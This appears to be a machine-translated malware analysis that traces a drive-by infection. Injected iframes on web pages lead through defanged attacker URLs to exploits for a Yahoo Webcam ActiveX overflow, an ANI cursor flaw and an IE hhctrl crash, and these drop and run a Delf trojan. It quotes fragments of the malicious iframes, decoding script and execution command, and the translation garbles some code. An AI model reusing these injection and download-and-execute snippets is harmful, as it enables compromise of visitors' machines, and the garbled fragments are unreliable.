The ARP virus and web site spread worm. Delf. yqz by exploiting the remote stack overflow vulnerability in the webcam Viewer ActiveX Control of Yahoo!

EndurerOriginal
1Version

When using a Web mailbox today, Kaspersky reports:
/---
Detected: malicious programExploit. html. ASCII. oURL: hxxp: // mm ***. 98*7 ** 99 *** 9.com/mm/a.htm
---/

Google searched and found that this code was added as an ARP virus.

Check that all webpages are added with code:
/---
<IFRAME src = "hxxp: // mm ***. 98*7 ** 99 *** 9.com/abc.htm "width =" 1 "Height =" 1 "frameborder =" 0 ">
</Iframe>
---/

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/abc.htmThe title is mobile phone and the content is "Service unavailable", which is confusing.
Code included:
/---
<IFRAME src = hxxp: // mm ***. 98*7 *** 99 *** 9.com/mm/a.htm width = 100 Height = 0> </iframe>
---/

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/mm/a.htmTitle: Love !, Contains two malicious codes.
One is a US-ASCII-encoded string.

The second is the code:
/---
<Script language = "JavaScript" src = "hxxp: // mm ***. 98*7 *** 99 *** 9.com/mm/ B .js"> </SCRIPT>
---/

To the http://purpleendurer.ys168.com download US-ASCII decoding program decryption, get a piece of Web Code, Title: Super ie 0day, the content is divided into three parts.

The first is the Javascript script code, which contains two user-defined functions: makeitso () and detectos (). makeitso () uses detectos () to detect the Windows version of the viewer's computer, in Windows XP or Windows, open logo.htmand disable banner.htm.

The second is the VBSCRIPT script code. The function is to create the Microsoft. XMLHTTP object. If it fails, the Javascript script code is output:
/---
<Script language = "JavaScript"> window. setTimeout ("" makeitso () "", 5000); </SCRIPT>
---/
Otherwise, the output code is as follows:
/---
<IFRAME width = "0" Height = "0" src = "apple.htm"> </iframe> ")
---/

The third is the Javascript script code. The function is to check whether cookiewoshi0day exists. If it does not exist, it is created and the code is output:
/---
<IFRAME width = 0 Height = 0 src?help.htm> </iframe>
---/

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/mm/ B .jsThe content is not encrypted. The function is to use thunderserver. webthunder.1 to downloadHxxp: // www.98 * 7 ** 99 ** 9.com/web.exe, Save to C:/and run.

File Description: D:/Digital Photo/web.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:18:44
Modification time: 13:19:39
Access time: 13:19:52
Size: 18432 bytes, 18.0 KB
MD5: 1c22de0a5753d9e2e9a88d65393d0a9b

Kaspersky response
Detected: Trojan programTrojan-Downloader.Win32.Delf.bjyFile: D:/test/web.exe/pe_patch.upx/UPX
Rising news:Worm. Delf. yqz

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/mm/logo.htmTitle: Kiss !,, Contains two malicious codes.
One is a US-ASCII-encoded string.

The second is the code:
/---
<IFRAME src = hxxp: // mm ***. 98*7 *** 99 *** 9.com/mm/test.htm width = 1 Height = 1 frameborder = 0> </iframe>
---/

The US-ASCII-encoded string is decoded in HTML code and is titled ieplorer, which contains:
/---
<LINK rel = "stylesheet" href = "gnyivsaq. CSS">
---/

Gnyivsaq. CSSThe content is:
/---
<Style type = text/CSS>
<! --
Body {cursor: URL ('hxxp: // www.98 * 7 ** 99 *** 9.com/yuianlqvzx.jpg ')}
--> </Style>
---/

Yuianlqvzx.jpgIt seems that the file does not exist. It is estimated that the ani vulnerability is used to download the file.

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/mm/test.htmUsedYahoo Messenger Webcam Viewer ActiveX Control Remote Stack Overflow VulnerabilityRemote attackers may exploit this vulnerability to control user machines.
Yahoo Messenger's webcam Viewer (ywcvwr. dll) ActiveX control does not correctly verify the input of server properties. If a user is cheated to access a malicious site and transmits a super-long string to this attribute and then calls the receive () method, Stack Overflow may be triggered and arbitrary commands may be executed.
Reference: hxxp: // mcafeefans.com/article.asp? Id = 1311

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/mm/banner.htmThe title is bypassing of Web filters by using ASCII exploit by cooldiyer. The content is the us-ascii.pdf of hxxp: // mm ***. 98 *** 7 *** 99 *** 9.com/mm/logo.htm.

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/mm/apple.htmThe content is Javascript script code. The function is to use eval () to execute custom functions.
/---
VaR S = function (m) {return string. fromcharcode (M ^ 109 )};
---/
The decrypted code.

The decrypted content is Javascript script code. The function is to download the file hxxp: // www.98 * 7 ** 99 *** 9.com/web.exeusing Microsoft. XMLHTTP and SCR using pting. FileSystemObject, and save the file name to windir.pdf:
/---
Function FK (n) {var number = math. Random () * n; return math.round(numberw.w.'.exe ';
}
---/
Generate, that is, **. EXE, where * is a number, and then move to the directory % WINDIR %/rising ***, and then run the Shell. Application Object Q's ShellExecute method:
% WINDIR %/system32/cmd.exe/C % WINDIR %/rising *****/***. EXE, "", "open", 0

Hxxp: // mm ***. 98 ** 7 ** 99 *** 9.com/mm/help.htmThe title is bypassing of Web filters by using ASCII exploit by cooldiyer, A US-ASCII-encoded string.

The decoded content is HTML code and the title is bypassing of Web filters by using ASCII exploit by cooldiyer and super ie 0day. The content is JavaScript code and the function uses ie Internet. the denial of service vulnerability of hhctrl ActiveX objects.
Affected Systems:
Microsoft Internet Explorer 6.0 SP1
Microsoft Iot Explorer 6.0
When the URL is not initialized, Internet Explorer calls the click () method of the Internet. hhctrl.1 ActiveX object to trigger NULL pointer reference, which may cause IE to crash.
Refer:
Denial of Service Vulnerability in IE Internet. hhctrl ActiveX Object
Http://it.rising.com.cn/Channels/Safety/LatestHole/Hole_Windows/2006-07-25/1153791365d36644.shtml